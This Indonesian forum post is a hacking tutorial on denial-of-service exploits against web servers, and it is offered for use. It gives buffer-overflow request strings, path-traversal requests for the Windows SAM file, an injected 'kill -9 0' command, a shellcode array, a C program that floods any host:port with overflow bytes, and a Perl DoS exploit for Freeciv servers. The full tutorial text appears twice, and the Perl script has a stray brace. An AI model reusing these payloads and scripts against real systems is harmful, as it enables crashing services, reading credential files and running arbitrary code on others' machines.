Tutorial Exploit Denial Of Service
Halaman 1 dari 1
Tutorial Exploit Denial Of Service
by Admin Sun Mar 16, 2008 12:57 pm
Tutorial ini dibuat secara ringkas namun mudah dipahami,karna saya sendiri juga rada males nulis panjang-panjang.
Disini juga tidak dijelaskan secara langsung apa itu 'Exploit','DOS' dan
bagimana membuat exploit itu secara manual/detail.
2 teh foint!
Misalnya ada sebuah program webserver yang terinfeksi buffer 0verfl0w
,untuk mengetahui apakah webserver tersebut dapat digunakan sebagai
Denial
Of Service,contoh ;
Buka telnet dan terkoneksi ke komputer lain.
telnet> o
target.com 80
connected to host..
GET <string>
Jika server tersebut DOWN/CRASH,maka bisa dikatakan adanya aktifitas
dari
Denial Of Service.
Berikut karakter string yg sering biasa digunakan bagi
Denial Of Service ke sebuah webserver :
1.Dengan menggunakan karakter string yang panjang
- GET A x 2140
- POST A x 2140
- GET / HTTP/1.0
'User-Agent: <4000 x A>
2.Eksekusi sebuah file yang diluar jangkauan direktori webserver
- GET .././../windows/repair/sam
- GET ../bin/kill%20-9%200|
- GET /cgi-bin/julianlove?type=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
3.Mengunakan shellcode exploit
- char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x34\x0a"
"\x2f\xfd\x83\xeb\xfc\xe2\xf4\xc8\xe2\x79\xfd\x34\x0a\x7c\xa8\x62"
"\x5d\xa4\x91\x10\x12\xa4\xb8\x08\x81\x7b\xf8\x4c\x0b\xc5\x76\x7e"
"\x12\xa4\xa7\x14\x0b\xc4\x1e\x06\x43\xa4\xc9\xbf\x0b\xc1\xcc\xcb"
"\xf6\x1e\x3d\x98\x32\xcf\x89\x33\xcb\xe0\xf0\x35\xcd\xc4\x0f\x0f"
"\x76\x0b\xe9\x41\xeb\xa4\xa7\x10\x0b\xc4\x9b\xbf\x06\x64\x76\x6e"
"\x16\x2e\x16\xbf\x0e\xa4\xfc\xdc\xe1\x2d\xcc\xf4\x55\x71\xa0\x6f"
"\xc8\x27\xfd\x6a\x60\x1f\xa4\x50\x81\x36\x76\x6f\x06\xa4\xa6\x28"
"\x81\x34\x76\x6f\x02\x7c\x95\xba\x44\x21\x11\xcb\xdc\xa6\x3a\xb5"
"\xe6\x2f\xfc\x34\x0a\x78\xab\x67\x83\xca\x15\x13\x0a\x2f\xfd\xa4"
"\x0b\x2f\xfd\x82\x13\x37\x1a\x90\x13\x5f\x14\xd1\x43\xa9\xb4\x90"
"\x10\x5f\x3a\x90\xa7\x01\x14\xed\x03\xda\x50\xff\xe7\xd3\xc6\x63"
"\x59\x1d\xa2\x07\x38\x2f\xa6\xb9\x41\x0f\xac\xcb\xdd\xa6\x22\xbd"
"\xc9\xa2\x88\x20\x60\x28\xa4\x65\x59\xd0\xc9\xbb\xf5\x7a\xf9\x6d"
"\x83\x2b\x73\xd6\xf8\x04\xda\x60\xf5\x18\x02\x61\x3a\x1e\x3d\x64"
"\x5a\x7f\xad\x74\x5a\x6f\xad\xcb\x5f\x03\x74\xf3\x3b\xf4\xae\x67"
"\x62\x2d\xfd\x25\x56\xa6\x1d\x5e\x1a\x7f\xaa\xcb\x5f\x0b\xae\x63"
"\xf5\x7a\xd5\x67\x5e\x78\x02\x61\x2a\xa6\x3a\x5c\x49\x62\xb9\x34"
"\x83\xcc\x7a\xce\x3b\xef\x70\x48\x2e\x83\x97\x21\x53\xdc\x56\xb3"
"\xf0\xac\x11\x60\xcc\x6b\xd9\x24\x4e\x49\x3a\x70\x2e\x13\xfc\x35"
"\x83\x53\xd9\x7c\x83\x53\xd9\x78\x83\x53\xd9\x64\x87\x6b\xd9\x24"
"\x5e\x7f\xac\x65\x5b\x6e\xac\x7d\x5b\x7e\xae\x65\xf5\x5a\xfd\x5c"
"\x78\xd1\x4e\x22\xf5\x7a\xf9\xcb\xda\xa6\x1b\xcb\x7f\x2f\x95\x99"
"\xd3\x2a\x33\xcb\x5f\x2b\x74\xf7\x60\xd0\x02\x02\xf5\xfc\x02\x41"
"\x0a\x47\x0d\xbe\x0e\x70\x02\x61\x0e\x1e\x26\x67\xf5\xff\xfd";
Yang lainya anda cuba sendiri..atau baca exploit/vulnerable terbaru
yang ada
di situs -situs security/hacker research
Setelah diketemukannya webserver DOS,saatnya untuk membuat exploit
dengan
C++ /Perl.
user@linux:~/ > telnet localhost 80
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
GET HTTP/1.1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//Dengan memerintah karakter A berkisar 1024 bytes ,webserver tersebut
menciptakan
//sebuah buffer overflow sehingga webserver tersebut langsung
'CRASH/DOWN'.
Kenapa CRASH?
liat output dari gdb
Program received signal SIGSEGV, Segmentation fault.
0x41414141 ?? ()
(gdb)
Seperti yang kita lihat eip set ke 0x41414141
0x41 adalah standard dari A..jika memberikan lebih dari 1024 bytes
,program
tersebut mengcopy ke sebuah nama string [2048]ke buffer [1024]....
,jadi
karena [2048] lebih besar dari 1024 bytes,buffer tersebut telah
dioverwrite
berikut eip (extended instruction pointer)
[xxxxxxxx-name-2048-bytes-xxxxxxxxxx]
[xxxxx buffer-only-1024-bytes xxx] [EIP]
Dengan sendirinya melompat ke alamat yg salah
(0x41414141)..ini dikatakan Segmentation fault
--------- D0S.c ----------------------
#include <stdio.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
int main(int argc, char **argv)
{
struct sockaddr_in addr;
struct hostent *host;
char buffer[2048];
int s, i;
if(argc != 3)
{
fprintf(stderr, "Usage: %s <host> <port>\n", argv[0]);
exit(0);
}
s = socket(AF_INET, SOCK_STREAM, 0);
if(s == -1)
{
perror("socket() ERROR\n");
exit(0);
}
host = gethostbyname(argv[1]);
if( host == NULL)
{
herror("gethostbyname() ERROR");
exit(0);
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(atol(argv[2]));
if(connect(s, &addr, sizeof(addr)) == -1)
{
perror("Connection to host ERROR\n");
exit(0);
}
/* Membuat kelipatan karakter 'A' ke 2048 bytes */
for(i = 0; i < 2048 ; i++)
buffer[i] = 'A';
/* 'A' disini adalah sebuah karakter string yg digunakan
mengirimkan/membuat buffer0verfl0w */
printf("buffer is: %s\n", buffer);
printf("buffer filled... now sending buffer\n");
/* 'Send(s,buffer' mengirimkan data buffer yg sudah terkoneksi ke
komputer tersebut */
send(s, buffer, strlen(buffer), 0);
printf("buffer sent.\n");
close(s);
return 0;
}
Berikut ini ada sebuah contoh webserver bermuatan Denial Of Service,
Dengan mengirimkan karakter string '@+2.0 conn_ping_info
username_info-beta8'
------------ D0S.pl -----------------
#!/usr/bin/perl
# Freeciv Server DoS Exploit
# --------------------------
#
# Greats:Nico Spicher (has discovered bug)
# info: 98.to/infamous
use IO::Socket;
$host=$ARGV[0];
$port=5555; #Port digunakan '5555'
if(!$ARGV[0]){
print "Freeciv Server DoS Exploit\n";
print "==========================\n";
print "INFGP-Hacking&Security Research\n";
print "[^]\n\n";
print "Usage:perl $0 [target]\n";
}
use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, );
close($socket);
if($socket){
print "[+]Attacking host..\n";
}
$conn = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Host not found\n";
print "[+]Connect on $port\n\n";
print "[+]Creating string\n";
#'line' disini artinya bisa digunakan mengirimkan sebagai string DOS
#Seperti halnya GET 'A' x 1240
$line="@+2.0 conn_ping_info username_info-beta8";
#Seperti $line="GET
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1"
print "[+]String sent..\n\n";
#Setelah terkoneksi ke komputer tersebut,perintah 'print' dapat
langsung dieksekusi
#dengan menjalankan socket serta mengirimkan paket buffer
0verfl0w,berikut '$line',
#karakter buffer string
print $conn "$line";
close($conn);
}
print "Server killed\n";
exit();
----------------------------------------- EOF
-------------------------------------------
Demikian sedikit pengetahuan yang didapat semoga dapat membantu dalam
membuat DOS exploit secara sederahana namun mudah dipahami.Selamat
mencoba!
Disini juga tidak dijelaskan secara langsung apa itu 'Exploit','DOS' dan
bagimana membuat exploit itu secara manual/detail.
2 teh foint!
Misalnya ada sebuah program webserver yang terinfeksi buffer 0verfl0w
,untuk mengetahui apakah webserver tersebut dapat digunakan sebagai
Denial
Of Service,contoh ;
Buka telnet dan terkoneksi ke komputer lain.
telnet> o
target.com 80
connected to host..
GET <string>
Jika server tersebut DOWN/CRASH,maka bisa dikatakan adanya aktifitas
dari
Denial Of Service.
Berikut karakter string yg sering biasa digunakan bagi
Denial Of Service ke sebuah webserver :
1.Dengan menggunakan karakter string yang panjang
- GET A x 2140
- POST A x 2140
- GET / HTTP/1.0
'User-Agent: <4000 x A>
2.Eksekusi sebuah file yang diluar jangkauan direktori webserver
- GET .././../windows/repair/sam
- GET ../bin/kill%20-9%200|
- GET /cgi-bin/julianlove?type=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
3.Mengunakan shellcode exploit
- char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x34\x0a"
"\x2f\xfd\x83\xeb\xfc\xe2\xf4\xc8\xe2\x79\xfd\x34\x0a\x7c\xa8\x62"
"\x5d\xa4\x91\x10\x12\xa4\xb8\x08\x81\x7b\xf8\x4c\x0b\xc5\x76\x7e"
"\x12\xa4\xa7\x14\x0b\xc4\x1e\x06\x43\xa4\xc9\xbf\x0b\xc1\xcc\xcb"
"\xf6\x1e\x3d\x98\x32\xcf\x89\x33\xcb\xe0\xf0\x35\xcd\xc4\x0f\x0f"
"\x76\x0b\xe9\x41\xeb\xa4\xa7\x10\x0b\xc4\x9b\xbf\x06\x64\x76\x6e"
"\x16\x2e\x16\xbf\x0e\xa4\xfc\xdc\xe1\x2d\xcc\xf4\x55\x71\xa0\x6f"
"\xc8\x27\xfd\x6a\x60\x1f\xa4\x50\x81\x36\x76\x6f\x06\xa4\xa6\x28"
"\x81\x34\x76\x6f\x02\x7c\x95\xba\x44\x21\x11\xcb\xdc\xa6\x3a\xb5"
"\xe6\x2f\xfc\x34\x0a\x78\xab\x67\x83\xca\x15\x13\x0a\x2f\xfd\xa4"
"\x0b\x2f\xfd\x82\x13\x37\x1a\x90\x13\x5f\x14\xd1\x43\xa9\xb4\x90"
"\x10\x5f\x3a\x90\xa7\x01\x14\xed\x03\xda\x50\xff\xe7\xd3\xc6\x63"
"\x59\x1d\xa2\x07\x38\x2f\xa6\xb9\x41\x0f\xac\xcb\xdd\xa6\x22\xbd"
"\xc9\xa2\x88\x20\x60\x28\xa4\x65\x59\xd0\xc9\xbb\xf5\x7a\xf9\x6d"
"\x83\x2b\x73\xd6\xf8\x04\xda\x60\xf5\x18\x02\x61\x3a\x1e\x3d\x64"
"\x5a\x7f\xad\x74\x5a\x6f\xad\xcb\x5f\x03\x74\xf3\x3b\xf4\xae\x67"
"\x62\x2d\xfd\x25\x56\xa6\x1d\x5e\x1a\x7f\xaa\xcb\x5f\x0b\xae\x63"
"\xf5\x7a\xd5\x67\x5e\x78\x02\x61\x2a\xa6\x3a\x5c\x49\x62\xb9\x34"
"\x83\xcc\x7a\xce\x3b\xef\x70\x48\x2e\x83\x97\x21\x53\xdc\x56\xb3"
"\xf0\xac\x11\x60\xcc\x6b\xd9\x24\x4e\x49\x3a\x70\x2e\x13\xfc\x35"
"\x83\x53\xd9\x7c\x83\x53\xd9\x78\x83\x53\xd9\x64\x87\x6b\xd9\x24"
"\x5e\x7f\xac\x65\x5b\x6e\xac\x7d\x5b\x7e\xae\x65\xf5\x5a\xfd\x5c"
"\x78\xd1\x4e\x22\xf5\x7a\xf9\xcb\xda\xa6\x1b\xcb\x7f\x2f\x95\x99"
"\xd3\x2a\x33\xcb\x5f\x2b\x74\xf7\x60\xd0\x02\x02\xf5\xfc\x02\x41"
"\x0a\x47\x0d\xbe\x0e\x70\x02\x61\x0e\x1e\x26\x67\xf5\xff\xfd";
Yang lainya anda cuba sendiri..atau baca exploit/vulnerable terbaru
yang ada
di situs -situs security/hacker research
Setelah diketemukannya webserver DOS,saatnya untuk membuat exploit
dengan
C++ /Perl.
user@linux:~/ > telnet localhost 80
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
GET HTTP/1.1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//Dengan memerintah karakter A berkisar 1024 bytes ,webserver tersebut
menciptakan
//sebuah buffer overflow sehingga webserver tersebut langsung
'CRASH/DOWN'.
Kenapa CRASH?
liat output dari gdb
Program received signal SIGSEGV, Segmentation fault.
0x41414141 ?? ()
(gdb)
Seperti yang kita lihat eip set ke 0x41414141
0x41 adalah standard dari A..jika memberikan lebih dari 1024 bytes
,program
tersebut mengcopy ke sebuah nama string [2048]ke buffer [1024]....
,jadi
karena [2048] lebih besar dari 1024 bytes,buffer tersebut telah
dioverwrite
berikut eip (extended instruction pointer)
[xxxxxxxx-name-2048-bytes-xxxxxxxxxx]
[xxxxx buffer-only-1024-bytes xxx] [EIP]
Dengan sendirinya melompat ke alamat yg salah
(0x41414141)..ini dikatakan Segmentation fault
--------- D0S.c ----------------------
#include <stdio.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
int main(int argc, char **argv)
{
struct sockaddr_in addr;
struct hostent *host;
char buffer[2048];
int s, i;
if(argc != 3)
{
fprintf(stderr, "Usage: %s <host> <port>\n", argv[0]);
exit(0);
}
s = socket(AF_INET, SOCK_STREAM, 0);
if(s == -1)
{
perror("socket() ERROR\n");
exit(0);
}
host = gethostbyname(argv[1]);
if( host == NULL)
{
herror("gethostbyname() ERROR");
exit(0);
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(atol(argv[2]));
if(connect(s, &addr, sizeof(addr)) == -1)
{
perror("Connection to host ERROR\n");
exit(0);
}
/* Membuat kelipatan karakter 'A' ke 2048 bytes */
for(i = 0; i < 2048 ; i++)
buffer[i] = 'A';
/* 'A' disini adalah sebuah karakter string yg digunakan
mengirimkan/membuat buffer0verfl0w */
printf("buffer is: %s\n", buffer);
printf("buffer filled... now sending buffer\n");
/* 'Send(s,buffer' mengirimkan data buffer yg sudah terkoneksi ke
komputer tersebut */
send(s, buffer, strlen(buffer), 0);
printf("buffer sent.\n");
close(s);
return 0;
}
Berikut ini ada sebuah contoh webserver bermuatan Denial Of Service,
Dengan mengirimkan karakter string '@+2.0 conn_ping_info
username_info-beta8'
------------ D0S.pl -----------------
#!/usr/bin/perl
# Freeciv Server DoS Exploit
# --------------------------
#
# Greats:Nico Spicher (has discovered bug)
# info: 98.to/infamous
use IO::Socket;
$host=$ARGV[0];
$port=5555; #Port digunakan '5555'
if(!$ARGV[0]){
print "Freeciv Server DoS Exploit\n";
print "==========================\n";
print "INFGP-Hacking&Security Research\n";
print "[^]\n\n";
print "Usage:perl $0 [target]\n";
}
use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, );
close($socket);
if($socket){
print "[+]Attacking host..\n";
}
$conn = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Host not found\n";
print "[+]Connect on $port\n\n";
print "[+]Creating string\n";
#'line' disini artinya bisa digunakan mengirimkan sebagai string DOS
#Seperti halnya GET 'A' x 1240
$line="@+2.0 conn_ping_info username_info-beta8";
#Seperti $line="GET
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1"
print "[+]String sent..\n\n";
#Setelah terkoneksi ke komputer tersebut,perintah 'print' dapat
langsung dieksekusi
#dengan menjalankan socket serta mengirimkan paket buffer
0verfl0w,berikut '$line',
#karakter buffer string
print $conn "$line";
close($conn);
}
print "Server killed\n";
exit();
----------------------------------------- EOF
-------------------------------------------
Demikian sedikit pengetahuan yang didapat semoga dapat membantu dalam
membuat DOS exploit secara sederahana namun mudah dipahami.Selamat
mencoba!
Admin- Admin
-
Jumlah posting : 99
Age : 37
Lokasi : Purworejo
Registration date : 22.01.08 -
Similar topics» affordable link building service backlink services
» SPECIALIST SERVICE LAPTOP - NOTEBOOK KEDIRI & SEKITARNYA
» SPECIALIST SERVICE LAPTOP - NOTEBOOK KEDIRI & SEKITARNYA
Halaman 1 dari 1
Permissions in this forum:
Anda tidak dapat menjawab topik|
|
|